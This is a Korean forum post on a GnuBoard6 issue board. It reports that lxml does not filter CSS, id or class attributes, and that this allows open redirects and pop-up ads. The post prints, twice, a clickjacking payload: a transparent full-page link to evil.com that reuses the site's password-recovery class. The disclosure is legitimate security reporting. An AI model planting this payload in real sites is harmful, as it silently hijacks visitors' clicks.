CSS, ID, CLASS misconfigure로 인한 취약점
lxml은 css 및 id, class 부분을 필터링 하지 않기 때문에 이를 조합하면 Open redirect, 광고 사이트 popup 등의 취약점이 발생될 수 있습니다.
영상에서 사용한 페이로드 입니다.
`<a href="https://evil.com" class="win_password_lost"
style="position:absolute; top:0; left:0; width:100%; height:100%; opacity:0.001; z-index:9999;">
Click me
</a>
`
https://github.com/user-attachments/assets/8b5f5ac9-d4b9-48e8-89e5-8077204f901f
영상에서 사용한 페이로드 입니다.
`<a href="https://evil.com" class="win_password_lost"
style="position:absolute; top:0; left:0; width:100%; height:100%; opacity:0.001; z-index:9999;">
Click me
</a>
`
https://github.com/user-attachments/assets/8b5f5ac9-d4b9-48e8-89e5-8077204f901f
게시판 목록
그누보드6 이슈
좋은 댓글과 좋아요는 제작자에게 큰힘이 됩니다.
| 번호 | 제목 | 글쓴이 | 날짜 | 조회 |
|---|---|---|---|---|
| 34 |
seiblog-nandsoft
|
1년 전 | 156 | |
| 33 |
seiblog-nandsoft
|
1년 전 | 140 | |
| 32 |
seiblog-nandsoft
|
1년 전 | 207 | |
| 31 |
seiblog-nandsoft
|
1년 전 | 235 | |
| 30 |
seiblog-nandsoft
|
1년 전 | 153 | |
| 29 |
seiblog-nandsoft
|
1년 전 | 190 | |
| 28 |
seiblog-nandsoft
|
1년 전 | 205 | |
| 27 |
seiblog-nandsoft
|
1년 전 | 134 | |
| 26 |
seiblog-nandsoft
|
1년 전 | 153 | |
| 25 |
seiblog-nandsoft
|
1년 전 | 168 | |
| 24 |
seiblog-nandsoft
|
1년 전 | 235 | |
| 23 |
seiblog-nandsoft
|
1년 전 | 227 | |
| 22 |
seiblog-nandsoft
|
1년 전 | 205 | |
| 21 |
seiblog-nandsoft
|
1년 전 | 203 | |
| 20 |
seiblog-nandsoft
|
1년 전 | 166 | |
| 19 |
seiblog-nandsoft
|
1년 전 | 280 | |
| 18 |
kagla
|
1년 전 | 238 | |
| 17 |
kagla
|
1년 전 | 202 | |
| 16 |
kitrio
|
1년 전 | 168 | |
| 15 |
kagla
|
1년 전 | 224 |
댓글 작성
댓글을 작성하시려면 로그인이 필요합니다.
로그인하기